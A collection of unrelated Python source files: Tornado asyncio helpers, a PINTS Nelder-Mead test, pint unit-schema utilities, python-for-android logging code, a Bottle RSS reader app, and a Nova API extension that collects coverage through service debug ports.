asyncio.set_event_loop(self.old_asyncio)
self.is_current = False
def to_tornado_future(asyncio_future: asyncio.Future) -> asyncio.Future:
"""Convert an `asyncio.Future` to a `tornado.concurrent.Future`.
.. versionadded:: 4.1
.. deprecated:: 5.0
Tornado ``Futures`` have been merged with `asyncio.Future`,
so this method is now a no-op.
"""
return asyncio_future
def to_asyncio_future(tornado_future: asyncio.Future) -> asyncio.Future:
"""Convert a Tornado yieldable object to an `asyncio.Future`.
.. versionadded:: 4.1
.. versionchanged:: 4.3
Now accepts any yieldable object, not just
`tornado.concurrent.Future`.
.. deprecated:: 5.0
Tornado ``Futures`` have been merged with `asyncio.Future`,
so this method is now equivalent to `tornado.gen.convert_yielded`.
"""
return convert_yielded(tornado_future)
class AnyThreadEventLoopPolicy(asyncio.DefaultEventLoopPolicy): # type: ignore
"""Event loop policy that allows loop creation on any thread.
The default `asyncio` event loop policy only automatically creates
event loops in the main threads. Other threads must create event
loops explicitly or `asyncio.get_event_loop` (and therefore
`.IOLoop.current`) will fail. Installing this policy allows event
loops to be created automatically on any thread, matching the
behavior of Tornado versions prior to 5.0 (or 5.0 on Python 2).
Usage::
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
.. versionadded:: 5.0
"""
def get_event_loop(self) -> asyncio.AbstractEventLoop:
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
# This was an AssertionError in python 3.4.2 (which ships with debian jessie)
# and changed to a RuntimeError in 3.4.3.
# "There is no current event loop in thread %r"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
|
|
#!/usr/bin/env python3
#
# Tests the basic methods of the Nelder-Mead optimiser.
#
# This file is part of PINTS (https://github.com/pints-team/pints/) which is
# released under the BSD 3-clause license. See accompanying LICENSE.md for
# copyright notice and full license details.
#
import numpy as np
import unittest
import sys
import pints
import pints.toy
from shared import StreamCapture
debug = False
method = pints.NelderMead
class TestNelderMead(unittest.TestCase):
"""
Tests the basic methods of the Nelder-Mead optimiser.
"""
def setUp(self):
""" Called before every test """
np.random.seed(1)
def problem(self):
""" Returns a test problem, starting point, sigma, and boundaries. """
r = pints.toy.ParabolicError()
x = [0.1, 0.1]
s = 0.1
b = pints.RectangularBoundaries([-1, -1], [1, 1])
return r, x, s, b
def test_unbounded(self):
# Runs an optimisation without boundaries.
r, x, s, b = self.problem()
opt = pints.OptimisationController(r, x, method=method)
opt.set_threshold(1e-3)
opt.set_log_to_screen(debug)
found_parameters, found_solution = opt.run()
self.assertTrue(found_solution < 1e-3)
@unittest.skipIf(sys.hexversion < 0x03040000, 'Python < 3.4')
def test_bounded_warning(self):
# Boundaries are not supported
r, x, s, b = self.problem()
# Rectangular boundaries
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
pints.OptimisationController(r, x, boundaries=b, method=method)
self.assertEqual(len(w), 1)
self.assertIn('does not support boundaries', str(w[-1].message))
def test_ask_tell(self):
# Tests ask-and-tell related error handling.
r, x, s, b = self.problem()
opt = method(x)
# Stop called when not running
self.assertFalse(opt.stop())
# Best position and score called before run
self.assertEqual(list(opt.xbest()), list(x))
self.assertEqual(opt.fbest(), float('inf'))
# Not running
self.assertFalse(opt.running())
# Running
xs = opt.ask()
fxs = [r(x) for x in xs]
self.assertTrue(opt.running())
opt.tell(fxs)
self.assertTrue(opt.running())
xs = opt.ask()
fxs = [r(x) for x in xs]
opt.tell(fxs)
# Tell before ask
self.assertRaisesRegex(
Exception, r'ask\(\) not called before tell\(\)', opt.tell, 5)
# Ask called twice
opt.ask()
self.assertRaisesRegex(
Exception, r'ask\(\) called twice', opt.ask)
def test_hyper_parameter_interface(self):
# Tests the hyper parameter interface for this optimiser.
r, x, s, b = self.problem()
opt = pints.OptimisationController(r, x, method=method)
m = opt.optimiser()
self.assertEqual(m.n_hyper_parameters(), 0)
def test_name(self):
# Tests the name() method.
opt = method(np.array([0, 1.01]))
self.assertIn('Nelder-Mead', opt.name())
def test_zeros_in_x(self):
# Tests if the method copes with zeros in x0 (which can go wrong
# depending on the initialisation method).
r = pints.toy.RosenbrockError()
x0 = [0, 0]
opt = pints.OptimisationController(r, x0, method=method)
opt.set_log_to_screen(False)
x, f = opt.run()
self.assertTrue(np.all(x == np.array([1, 1])))
self.assertEqual(f, 0)
def test_bad_tell(self):
# Tests errors if wrong sizes are passed to tell
r = pints.toy.RosenbrockError()
e = pints.SequentialEvaluator(r)
x0 = [0, 0]
# Give wrong initial number
opt = method(x0)
xs = opt.ask()
fxs = e.evaluate(xs)
self.assertRaisesRegex(
ValueError, r'of length \(1 \+ n_parameters\)', opt.tell, fxs[:-1])
# Give wrong intermediate answer
opt = method(x0)
opt.tell(e.evaluate(opt.ask()))
x = opt.ask()[0]
fx = e.evaluate([x])
self.assertRaisesRegex(
ValueError, 'only a single evaluation', opt.tell, [fx, fx])
# Give wrong answer in shrink step
with self.assertRaisesRegex(ValueError, 'length n_parameters'):
opt = method(x0)
for i in range(500):
opt.tell(e.evaluate(opt.ask()))
if opt._shrink:
xs = opt.ask()
fxs = e.evaluate(xs)
opt.tell(fxs[:-1])
break
def test_rosenbrock(self):
# Tests the actions of the optimiser against a stored result
r = pints.toy.RosenbrockError()
x0 = [-0.75, 3.5]
opt = pints.OptimisationController(r, x0, method=method)
opt.set_log_to_screen(True)
with StreamCapture() as c:
x, f = opt.run()
log = c.text()
self.assertTrue(np.all(x == np.array([1, 1])))
self.assertEqual(f, 0)
exp_lines = (
'Minimising error measure',
'Using Nelder-Mead',
'Running in sequential mode.',
'Iter. Eval. Best Time m:s',
'0 3 865.9531 0:00.0',
'1 4 832.5452 0:00.0',
'2 5 832.5452 0:00.0',
'3 6 628.243 0:00.0',
'20 23 4.95828 0:00.0',
'40 43 3.525867 0:00.0',
'60 63 2.377579 0:00.0',
'80 83 1.114115 0:00.0',
'100 103 0.551 0:00.0',
'120 123 0.237 0:00.0',
'140 143 0.0666 0:00.0',
'160 163 0.00181 0:00.0',
'180 183 6.96e-06 0:00.0',
'200 203 2.66e-08 0:00.0',
'220 223 5.06e-11 0:00.0',
'240 243 2.43e-15 0:00.0',
'260 263 5.58e-18 0:00.0',
'280 283 7.74e-20 0:00.0',
'300 303 6.66e-23 0:00.0',
'320 323 1.86e-25 0:00.0',
'340 343 3.16e-28 0:00.0',
'360 364 3.08e-31 0:00.0',
'380 390 0 0:00.0',
'400 416 0 0:00.0',
'420 443 0 0:00.0',
'422 444 0 0:00.0',
'Halting: No significant change for 200 iterations.',
)
# Compare lenght of log
log_lines = [line.rstrip() for line in log.splitlines()]
self.assertEqual(len(log_lines), len(exp_lines))
# Compare log lines, ignoring time bit (unles it's way too slow)
for i, line1 in enumerate(log_lines):
line2 = exp_lines[i]
if line2[-6:] == '0:00.0':
line1 = line1[:-6]
line2 = line2[:-6]
self.assertEqual(line1, line2)
if __name__ == '__main__':
print('Add -v for more debug output')
import sys
if '-v' in sys.argv:
debug = True
unittest.main()
|
|
#!/usr/bin/env python
# -- coding: utf-8 --
from fnmatch import fnmatch
# make units optional when importing jsonextended
try:
import numpy as np
except ImportError:
pass
from jsonextended.edict import flatten, flatten2d, unflatten, merge
def get_in_units(value, units):
"""get a value in the required units """
try:
from pint import UnitRegistry
ureg = UnitRegistry()
except ImportError:
raise ImportError('please install pint to use this module')
return ureg.Quantity(value, units)
def apply_unitschema(data, uschema, as_quantity=True,
raise_outerr=False, convert_base=False,
use_wildcards=False, list_of_dicts=False):
""" apply the unit schema to the data
Parameters
----------
data : dict
uschema : dict
units schema to apply
as_quantity : bool
if true, return values as pint.Quantity objects
raise_outerr : bool
raise error if a unit cannot be found in the outschema
convert_to_base : bool
rescale units to base units
use_wildcards : bool
if true, can use * (matches everything) and ? (matches any single character)
list_of_dicts: bool
treat list of dicts as additional branches
Examples
--------
>>> from pprint import pprint
>>> data = {'energy':1,'x':[1,2],'other':{'y':[4,5]},'y':[4,5],'meta':None}
>>> uschema = {'energy':'eV','x':'nm','other':{'y':'m'},'y':'cm'}
>>> data_units = apply_unitschema(data,uschema)
>>> pprint(data_units)
{'energy': <Quantity(1, 'electron_volt')>,
'meta': None,
'other': {'y': <Quantity([4 5], 'meter')>},
'x': <Quantity([1 2], 'nanometer')>,
'y': <Quantity([4 5], 'centimeter')>}
>>> newschema = {'energy':'kJ','other':{'y':'nm'},'y':'m'}
>>> new_data = apply_unitschema(data_units,newschema)
>>> str(new_data["energy"])
'1.60217653e-22 kilojoule'
>>> new_data["other"]["y"].magnitude.round(3).tolist(), str(new_data["other"]["y"].units)
([4000000000.0, 5000000000.0], 'nanometer')
>>> old_data = apply_unitschema(new_data,uschema,as_quantity=False)
>>> old_data["energy"]
1.0
>>> old_data["other"]["y"].round(3).tolist()
[4.0, 5.0]
""" # noqa: E501
try:
from pint import UnitRegistry
ureg = UnitRegistry()
from pint.quantity import _Quantity
except ImportError:
raise ImportError('please install pint to use this module')
list_of_dicts = '__list__' if list_of_dicts else None
# flatten edict
uschema_flat = flatten(uschema, key_as_tuple=True)
# sorted by longest key size, to get best match first
uschema_keys = sorted(uschema_flat, key=len, reverse=True)
data_flat = flatten(data, key_as_tuple=True, list_of_dicts=list_of_dicts)
for dkey, dvalue in data_flat.items():
converted = False
for ukey in uschema_keys:
if not len(ukey) == len(dkey[-len(ukey):]):
continue
if use_wildcards:
match = all(
[fnmatch(d, u) for u, d in zip(ukey, dkey[-len(ukey):])])
else:
match = ukey == dkey[-len(ukey):]
if match:
# handle that it return an numpy object type if list of floats
if isinstance(dvalue, (list, tuple)):
dvalue = np.array(dvalue)
if dvalue.dtype == np.object:
dvalue = dvalue.astype(float)
if isinstance(dvalue, _Quantity):
quantity = dvalue.to(uschema_flat[ukey])
else:
quantity = ureg.Quantity(dvalue, uschema_flat[ukey])
if convert_base:
quantity = quantity.to_base_units()
if as_quantity:
data_flat[dkey] = quantity
else:
data_flat[dkey] = quantity.magnitude
break
if not converted and raise_outerr:
raise KeyError('could not find units for {}'.format(dkey))
return unflatten(data_flat, list_of_dicts=list_of_dicts)
def split_quantities(data, units='units', magnitude='magnitude',
list_of_dicts=False):
""" split pint.Quantity objects into <unit,magnitude> pairs
Parameters
----------
data : dict
units : str
name for units key
magnitude : str
name for magnitude key
list_of_dicts: bool
treat list of dicts as additional branches
Examples
--------
>>> from pprint import pprint
>>> from pint import UnitRegistry
>>> ureg = UnitRegistry()
>>> Q = ureg.Quantity
>>> qdata = {'energy': Q(1.602e-22, 'kilojoule'),
... 'meta': None,
... 'other': {'y': Q([4,5,6], 'nanometer')},
... 'x': Q([1,2,3], 'nanometer'),
... 'y': Q([8,9,10], 'meter')}
...
>>> split_data = split_quantities(qdata)
>>> pprint(split_data)
{'energy': {'magnitude': 1.602e-22, 'units': 'kilojoule'},
'meta': None,
'other': {'y': {'magnitude': array([4, 5, 6]), 'units': 'nanometer'}},
'x': {'magnitude': array([1, 2, 3]), 'units': 'nanometer'},
'y': {'magnitude': array([ 8, 9, 10]), 'units': 'meter'}}
"""
try:
from pint.quantity import _Quantity
except ImportError:
raise ImportError('please install pint to use this module')
list_of_dicts = '__list__' if list_of_dicts else None
data_flatten = flatten(data, list_of_dicts=list_of_dicts)
for key, val in data_flatten.items():
if isinstance(val, _Quantity):
data_flatten[key] = {units: str(val.units),
magnitude: val.magnitude}
return unflatten(data_flatten, list_of_dicts=list_of_dicts)
def combine_quantities(data, units='units', magnitude='magnitude',
list_of_dicts=False):
""" combine <unit,magnitude> pairs into pint.Quantity objects
Parameters
----------
data : dict
units : str
name of units key
magnitude : str
name of magnitude key
list_of_dicts: bool
treat list of dicts as additional branches
Examples
--------
>>> from pprint import pprint
>>> sdata = {'energy': {'magnitude': 1.602e-22, 'units': 'kilojoule'},
... 'meta': None,
... 'other': {'y': {'magnitude': [4, 5, 6], 'units': 'nanometer'}},
... 'x': {'magnitude': [1, 2, 3], 'units': 'nanometer'},
... 'y': {'magnitude': [8,9,10], 'units': 'meter'}}
...
>>> combined_data = combine_quantities(sdata)
>>> pprint(combined_data)
{'energy': <Quantity(1.602e-22, 'kilojoule')>,
'meta': None,
'other': {'y': <Quantity([4 5 6], 'nanometer')>},
'x': <Quantity([1 2 3], 'nanometer')>,
'y': <Quantity([ 8 9 10], 'meter')>}
""" # noqa: E501
try:
from pint import UnitRegistry
ureg = UnitRegistry()
except ImportError:
raise ImportError('please install pint to use this module')
list_of_dicts = '__list__' if list_of_dicts else None
data_flatten2d = flatten2d(data, list_of_dicts=list_of_dicts)
new_dict = {}
for key, val in list(data_flatten2d.items()):
if units in val and magnitude in val:
quantity = ureg.Quantity(val.pop(magnitude), val.pop(units))
if not val:
data_flatten2d.pop(key)
new_dict[key] = quantity
final_dict = merge([data_flatten2d, new_dict])
# olddict = unflatten(data_flatten2d,list_of_dicts=list_of_dicts)
# new_dict = unflatten(new_dict,list_of_dicts=list_of_dicts)
return unflatten(
final_dict, list_of_dicts=list_of_dicts) # merge([olddict,new_dict])
if __name__ == '__main__':
import doctest
print(doctest.testmod())
|
|
import logging
import os
import re
import sh
from sys import stdout, stderr
from math import log10
from collections import defaultdict
from colorama import Style as Colo_Style, Fore as Colo_Fore
import six
# This codecs change fixes a bug with log output, but crashes under python3
if not six.PY3:
import codecs
stdout = codecs.getwriter('utf8')(stdout)
stderr = codecs.getwriter('utf8')(stderr)
if six.PY2:
unistr = unicode
else:
unistr = str
# monkey patch to show full output
sh.ErrorReturnCode.truncate_cap = 999999
class LevelDifferentiatingFormatter(logging.Formatter):
def format(self, record):
if record.levelno > 30:
record.msg = '{}{}[ERROR]{}{}: '.format(
Err_Style.BRIGHT, Err_Fore.RED, Err_Fore.RESET,
Err_Style.RESET_ALL) + record.msg
elif record.levelno > 20:
record.msg = '{}{}[WARNING]{}{}: '.format(
Err_Style.BRIGHT, Err_Fore.RED, Err_Fore.RESET,
Err_Style.RESET_ALL) + record.msg
elif record.levelno > 10:
record.msg = '{}[INFO]{}: '.format(
Err_Style.BRIGHT, Err_Style.RESET_ALL) + record.msg
else:
record.msg = '{}{}[DEBUG]{}{}: '.format(
Err_Style.BRIGHT, Err_Fore.LIGHTBLACK_EX, Err_Fore.RESET,
Err_Style.RESET_ALL) + record.msg
return super(LevelDifferentiatingFormatter, self).format(record)
logger = logging.getLogger('p4a')
if not hasattr(logger, 'touched'): # Necessary as importlib reloads
# this, which would add a second
# handler and reset the level
logger.setLevel(logging.INFO)
logger.touched = True
ch = logging.StreamHandler(stderr)
formatter = LevelDifferentiatingFormatter('%(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
info = logger.info
debug = logger.debug
warning = logger.warning
error = logger.error
class colorama_shim(object):
def __init__(self, real):
self._dict = defaultdict(str)
self._real = real
self._enabled = False
def __getattr__(self, key):
return getattr(self._real, key) if self._enabled else self._dict[key]
def enable(self, enable):
self._enabled = enable
Out_Style = colorama_shim(Colo_Style)
Out_Fore = colorama_shim(Colo_Fore)
Err_Style = colorama_shim(Colo_Style)
Err_Fore = colorama_shim(Colo_Fore)
def setup_color(color):
enable_out = (False if color == 'never' else
True if color == 'always' else
stdout.isatty())
Out_Style.enable(enable_out)
Out_Fore.enable(enable_out)
enable_err = (False if color == 'never' else
True if color == 'always' else
stderr.isatty())
Err_Style.enable(enable_err)
Err_Fore.enable(enable_err)
def info_main(*args):
logger.info(''.join([Err_Style.BRIGHT, Err_Fore.GREEN] + list(args) +
[Err_Style.RESET_ALL, Err_Fore.RESET]))
def info_notify(s):
info('{}{}{}{}'.format(Err_Style.BRIGHT, Err_Fore.LIGHTBLUE_EX, s,
Err_Style.RESET_ALL))
def shorten_string(string, max_width):
''' make limited length string in form:
"the string is very lo...(and 15 more)"
'''
string_len = len(string)
if string_len <= max_width:
return string
visible = max_width - 16 - int(log10(string_len))
# expected suffix len "...(and XXXXX more)"
if not isinstance(string, unistr):
visstring = unistr(string[:visible], errors='ignore')
else:
visstring = string[:visible]
return u''.join((visstring, u'...(and ',
unistr(string_len - visible), u' more)'))
def get_console_width():
try:
cols = int(os.environ['COLUMNS'])
except (KeyError, ValueError):
pass
else:
if cols >= 25:
return cols
try:
cols = max(25, int(os.popen('stty size', 'r').read().split()[1]))
except Exception:
pass
else:
return cols
return 100
def shprint(command, *args, **kwargs):
'''Runs the command (which should be an sh.Command instance), while
logging the output.'''
kwargs["_iter"] = True
kwargs["_out_bufsize"] = 1
kwargs["_err_to_out"] = True
kwargs["_bg"] = True
is_critical = kwargs.pop('_critical', False)
tail_n = kwargs.pop('_tail', 0)
filter_in = kwargs.pop('_filter', None)
filter_out = kwargs.pop('_filterout', None)
if len(logger.handlers) > 1:
logger.removeHandler(logger.handlers[1])
columns = get_console_width()
command_path = str(command).split('/')
command_string = command_path[-1]
string = ' '.join(['{}->{} running'.format(Out_Fore.LIGHTBLACK_EX,
Out_Style.RESET_ALL),
command_string] + list(args))
# If logging is not in DEBUG mode, trim the command if necessary
if logger.level > logging.DEBUG:
logger.info('{}{}'.format(shorten_string(string, columns - 12),
Err_Style.RESET_ALL))
else:
logger.debug('{}{}'.format(string, Err_Style.RESET_ALL))
need_closing_newline = False
try:
msg_hdr = ' working: '
msg_width = columns - len(msg_hdr) - 1
output = command(*args, **kwargs)
for line in output:
if logger.level > logging.DEBUG:
msg = line.replace(
'\n', ' ').replace(
'\t', ' ').replace(
'\b', ' ').rstrip()
if msg:
stdout.write(u'{}\r{}{:<{width}}'.format(
Err_Style.RESET_ALL, msg_hdr,
shorten_string(msg, msg_width), width=msg_width))
stdout.flush()
need_closing_newline = True
else:
logger.debug(''.join(['\t', line.rstrip()]))
if need_closing_newline:
stdout.write('{}\r{:>{width}}\r'.format(
Err_Style.RESET_ALL, ' ', width=(columns - 1)))
stdout.flush()
except sh.ErrorReturnCode as err:
if need_closing_newline:
stdout.write('{}\r{:>{width}}\r'.format(
Err_Style.RESET_ALL, ' ', width=(columns - 1)))
stdout.flush()
if tail_n or filter_in or filter_out:
def printtail(out, name, forecolor, tail_n=0,
re_filter_in=None, re_filter_out=None):
lines = out.splitlines()
if re_filter_in is not None:
lines = [l for l in lines if re_filter_in.search(l)]
if re_filter_out is not None:
lines = [l for l in lines if not re_filter_out.search(l)]
if tail_n == 0 or len(lines) <= tail_n:
info('{}:\n{}\t{}{}'.format(
name, forecolor, '\t\n'.join(lines), Out_Fore.RESET))
else:
info('{} (last {} lines of {}):\n{}\t{}{}'.format(
name, tail_n, len(lines),
forecolor, '\t\n'.join([s for s in lines[-tail_n:]]),
Out_Fore.RESET))
printtail(err.stdout.decode('utf-8'), 'STDOUT', Out_Fore.YELLOW, tail_n,
re.compile(filter_in) if filter_in else None,
re.compile(filter_out) if filter_out else None)
printtail(err.stderr.decode('utf-8'), 'STDERR', Err_Fore.RED)
if is_critical:
env = kwargs.get("env")
if env is not None:
info("{}ENV:{}\n{}\n".format(
Err_Fore.YELLOW, Err_Fore.RESET, "\n".join(
"set {}={}".format(n, v) for n, v in env.items())))
info("{}COMMAND:{}\ncd {} && {} {}\n".format(
Err_Fore.YELLOW, Err_Fore.RESET, os.getcwd(), command,
' '.join(args)))
warning("{}ERROR: {} failed!{}".format(
Err_Fore.RED, command, Err_Fore.RESET))
exit(1)
else:
raise
return output
|
|
import json
import math
try:
from urllib.parse import urlencode, urlunsplit
except ImportError:
from urlparse import urlunsplit
from urllib import urlencode
from bottle import Response, error, route, run, template, install, redirect, hook, \
request, response, abort, static_file, JSONPlugin, url
from models import *
import logging
#logger = logging.getLogger("peewee")
#logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
@error(500)
@error(404)
@error(403)
@error(510)
def custom_error(error) -> Response:
if request.get_header('Accept') == 'application/json':
return Response(json.dumps({'message': error.body}), status=error.status_code)
else:
return Response(error.status + ", " + error.body, status=error.status_code)
class CustomJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return str(obj.strftime("%Y-%m-%d %H:%M:%S"))
if isinstance(obj, Model):
return obj.__dict__['_data']
return json.JSONEncoder.default(self, obj)
install(JSONPlugin(json_dumps=lambda s: json.dumps(s, cls=CustomJsonEncoder)))
def request_accept_json():
return request.get_header('Accept') == 'application/json'
def is_active(url: str) -> str:
params = request.query
valid_keys = 'starred'
valid_params = dict((k, v) for k, v in params.items() if k in valid_keys)
full_path = urlunsplit(('', '', request.path, urlencode(valid_params), ''))
return 'active' if full_path == url else ''
def favicon(id: str) -> str:
file = str(id) + '.ico'
path = 'feed.png'
if os.path.exists(os.path.join('static', 'favicons', file)):
path = 'favicons/' + file
return url('/static/<filename:path>', filename=path)
def date_format(date: DateField) -> str:
formatted = '--:--'
if date:
formatted = date.strftime('%H:%M') if (date.date() == datetime.today().date()) else date.strftime('%y-%m-%d')
return formatted
@hook('before_request')
def connect():
db.connect()
@hook('after_request')
def disconnect():
if not db.is_closed():
db.close()
@route('/')
def index():
redirect(url('/items'))
@route('/channels/<id:int>/items', method='GET')
@route('/items', method='GET')
def items(id:int=None) -> str:
valid_params = {'1': True, '0': False}
starred = valid_params.get(request.query.getone('starred'))
read = valid_params.get(request.query.getone('read'))
channel_ids = [int(i) for i in request.query.getlist('channel')]
channel_ids += [id] if id is not None else []
since_id = request.query.since_id
max_id = request.query.max_id
count = int(request.query.count) if request.query.count else 25
page = int(request.query.page) if request.query.page else 1
search = request.query.q
query = Item.select()
#for channel_id in channel_ids:
if channel_ids:
query = query.where(Item.channel << channel_ids)
if starred:
query = query.where(Item.starred == starred)
if read:
query = query.where(Item.read == read)
if since_id:
query = query.where(Item.id >= since_id)
if max_id:
query = query.where(Item.id <= max_id)
if search:
search = '%' + search + '%'
query = query.where(Item.title ** search | Item.description ** search | Item.author ** search)
#total_count = query.count()
if page and count: query = query.paginate(page, count)
for it in query:
it.new = False
it.save()
out = {'items': list(query.order_by(Item.updated.desc()).limit(count))}
channels = Channel.select().order_by(Channel.title)
for c in channels:
c.filter = True if c.id in channel_ids else False
#if channel:
#Item.update(new=False).where(Item.channel == channel).execute()
params = {}
for p in request.query.keys():
params[p] = request.query.getall(p)
params['page'] = page + 1
out['next'] = urlunsplit(('', '', request.fullpath, urlencode(params, doseq=True), ''))
params['page'] = page - 1 if page > 1 else 1
out['prev'] = urlunsplit(('', '', request.fullpath, urlencode(params, doseq=True), '')) if page > 1 else None
if request_accept_json():
return out
else:
return template('index', out, is_active=is_active, favicon=favicon, date_format=date_format, channels=channels)
@route('/items/<id:int>', method='GET')
def item(id:int) -> str:
try:
item = Item.get(Item.id == id)
except Item.DoesNotExist:
abort(404, 'Item does not exist')
if request.get_header('Accept') == 'application/json':
return {'item': item}
else:
return template('item', {'item': item})
@route('/items/<id:int>', method='PATCH')
def patch_item(id:int) -> str:
try:
item = Item.get(Item.id == id)
except Item.DoesNotExist:
abort(404)
valid_keys = ['read', 'starred']
for key in set(valid_keys).intersection(set(request.json.keys())):
setattr(item, key, request.json[key])
item.save()
return response.status
@route("/channels", method='GET')
def channels() -> str:
return {'channels': Channel.select()}
@route("/channels/<id:int>", method='GET')
def channel(id:int) -> str:
try:
channel = Channel.get(Channel.id == id)
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
return {'channel': channel}
@route('/channels/<id:int>/delete', method='GET')
def delete_channel_confirm(id:int) -> str:
try:
channel = Channel.get(Channel.id == id)
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
return template('delete', channel=channel)
@route('/channels/<id:int>', method='DELETE')
@route('/channels/<id:int>/delete', method='POST')
def delete_channel(id:int):
try:
channel = Channel.get(Channel.id == id)
Item.delete().where(Item.channel == channel).execute()
channel.delete_favicon()
Channel.delete().where(Channel.id == id).execute()
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
redirect(url('/'))
@route('/channels/create', method='GET')
def create_channel() -> str:
return template('create')
@route('/channels', method='POST')
def post_channel():
url = request.forms.get('url')
Channel.create_from_url(url)
channel = Channel.get(Channel.url == url)
channel.save_favicon()
channel.update_feed()
redirect(url('/channels/<id:int>/items', id=channel.id))
@route('/channels/<id:int>/edit', method='GET')
def edit_channel(id:int) -> str:
channel = Channel.get(Channel.id == id)
return template('edit', channel=channel)
@route('/channels/<id:int>/edit', method='POST')
def edit_channel_post(id:int):
title = request.forms.get('title')
url = request.forms.get('url')
channel = Channel.get(Channel.id == id)
channel.title = title
channel.url = url
channel.save()
redirect(url('/channels/<id:int>/items', id=channel.id))
@route('/channels/update', method='GET')
def update_channels():
for channel in Channel.select():
try:
channel.update_feed()
except:
continue
return redirect(url('/items'))
# possibly temporary route to update favicons for already established db's
@route('/channels/update-favicons', method='GET')
def update_channels():
for c in Channel.select():
try:
c.save_favicon()
except :
continue
return redirect(url('/items'))
@route('/channels/<id:int>/update', method='GET')
def update_channel(id: int):
try:
channel = Channel.get(Channel.id == id)
channel.update_feed()
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
return redirect(url('/channels/<id:int>/items', id=channel.id))
@route('/channels/import', method='GET')
def import_channels():
return template('import')
@route('/channels/import', method='POST')
def import_channels_post():
upload = request.files.get('file')
Channel.create_from_file(upload.file)
redirect(url('/items'))
@route('/static/<filename:path>')
def server_static(filename: str) -> Response:
return static_file(filename, root='static/')
@route('/favicon.ico')
def get_favicon() -> Response:
return server_static('favicon.ico')
if __name__ == '__main__':
try:
from mod_wsgi import version
except:
run(host='0.0.0.0', port=3000, reloader=True, debug=True)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
# See: http://wiki.openstack.org/Nova/CoverageExtension for more information
# and usage explanation for this API extension
import os
import re
import socket
import sys
import telnetlib
import tempfile
from oslo.config import cfg
from webob import exc
from nova.api.openstack import extensions
from nova.cert import rpcapi as cert_api
from nova.compute import api as compute_api
from nova.conductor import api as conductor_api
from nova.console import api as console_api
from nova.consoleauth import rpcapi as consoleauth_api
from nova import db
from nova.network import api as network_api
from nova.openstack.common import log as logging
from nova.scheduler import rpcapi as scheduler_api
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'coverage_ext')
CONF = cfg.CONF
class CoverageController(object):
"""The Coverage report API controller for the OpenStack API."""
def __init__(self):
self.data_path = tempfile.mkdtemp(prefix='nova-coverage_')
self.compute_api = compute_api.API()
self.network_api = network_api.API()
self.conductor_api = conductor_api.API()
self.consoleauth_api = consoleauth_api.ConsoleAuthAPI()
self.console_api = console_api.API()
self.scheduler_api = scheduler_api.SchedulerAPI()
self.cert_api = cert_api.CertAPI()
self.services = []
self.combine = False
self._cover_inst = None
self.host = CONF.host
super(CoverageController, self).__init__()
@property
def coverInst(self):
if not self._cover_inst:
try:
import coverage
data_out = os.path.join(self.data_path, '.nova-coverage')
self._cover_inst = coverage.coverage(data_file=data_out)
except ImportError:
pass
return self._cover_inst
def _find_services(self, req):
"""Returns a list of services."""
context = req.environ['nova.context']
services = db.service_get_all(context)
hosts = []
for serv in services:
hosts.append({"service": serv["topic"], "host": serv["host"]})
return hosts
def _find_ports(self, req, hosts):
"""Return a list of backdoor ports for all services in the list."""
context = req.environ['nova.context']
apicommands = {
"compute": self.compute_api.get_backdoor_port,
"network": self.network_api.get_backdoor_port,
"conductor": self.conductor_api.get_backdoor_port,
"consoleauth": self.consoleauth_api.get_backdoor_port,
"console": self.console_api.get_backdoor_port,
"scheduler": self.scheduler_api.get_backdoor_port,
"cert": self.cert_api.get_backdoor_port,
}
ports = []
#TODO(mtreinish): Figure out how to bind the backdoor socket to 0.0.0.0
# Currently this will only work if the host is resolved as loopback on
# the same host as api-server
for host in hosts:
if host['service'] in apicommands:
get_port_fn = apicommands[host['service']]
_host = host
_host['port'] = get_port_fn(context, host['host'])
#NOTE(mtreinish): if the port is None then it wasn't set in
# the configuration file for this service. However, that
# doesn't necessarily mean that we don't have backdoor ports
# for all the services. So, skip the telnet connection for
# this service.
if _host['port']:
ports.append(_host)
else:
LOG.warning(_("Can't connect to service: %s, no port"
"specified\n"), host['service'])
else:
LOG.debug(_("No backdoor API command for service: %s\n"), host)
return ports
def _start_coverage_telnet(self, tn, service):
data_file = os.path.join(self.data_path,
'.nova-coverage.%s' % str(service))
tn.write('import sys\n')
tn.write('from coverage import coverage\n')
tn.write("coverInst = coverage(data_file='%s') "
"if 'coverInst' not in locals() "
"else coverInst\n" % data_file)
tn.write('coverInst.skipModules = sys.modules.keys()\n')
tn.write("coverInst.start()\n")
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
def _start_coverage(self, req, body):
'''Begin recording coverage information.'''
LOG.debug(_("Coverage begin"))
body = body['start']
self.combine = False
if 'combine' in body.keys():
self.combine = bool(body['combine'])
self.coverInst.skipModules = sys.modules.keys()
self.coverInst.start()
hosts = self._find_services(req)
ports = self._find_ports(req, hosts)
self.services = []
for service in ports:
try:
service['telnet'] = telnetlib.Telnet(service['host'],
service['port'])
# NOTE(mtreinish): Fallback to try connecting to lo if
# ECONNREFUSED is raised. If using the hostname that is returned
# for the service from the service_get_all() DB query raises
# ECONNREFUSED it most likely means that the hostname in the DB
# doesn't resolve to 127.0.0.1. Currently backdoors only open on
# loopback so this is for covering the common single host use case
except socket.error as e:
if 'ECONNREFUSED' in e and service['host'] == self.host:
service['telnet'] = telnetlib.Telnet('127.0.0.1',
service['port'])
else:
raise e
self.services.append(service)
self._start_coverage_telnet(service['telnet'], service['service'])
def _stop_coverage_telnet(self, tn):
tn.write("coverInst.stop()\n")
tn.write("coverInst.save()\n")
